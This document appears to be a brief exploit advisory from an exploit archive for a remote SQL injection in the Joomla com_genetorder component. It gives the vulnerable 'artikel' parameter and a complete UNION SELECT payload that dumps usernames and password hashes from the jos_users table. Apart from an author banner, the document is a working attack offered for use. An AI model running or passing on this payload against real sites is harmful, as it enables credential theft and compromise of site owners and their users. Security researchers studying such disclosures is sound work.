The Joomla Genetorder component suffers from a remote SQL injection vulnerability.
e74d7a42bb60e9364d7f5e9cac2de8d4282807c6d906717846eb70e21155319f
============================================================================
=
=
= Author : Fl0riX =
=
=
= Greez: Sakkure, Code Hunters Family & All CW
=
=
=
= Name: J oomla com_genetorder
=
=
=
= Bug Type: SQL Injection
=
= == == == == == == == == == == == == == == == == == == == == == == == == == == == == == == ==
= Example:
=
site/index.php?option=com_genetorder&shop=artikelbeschreibung&artikel=[EXPLOIT]
= == == == == == == == == == == == == == == == == == == == == == == ==
== == == == == == == ==
=
Exploit :
=
null+union+select+1,2,concat(username,0x3a,password)fl0rix,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+jos_users-
= == == == == == == == == == == == == == == == == == == == == == == ==
== == == == == == == ==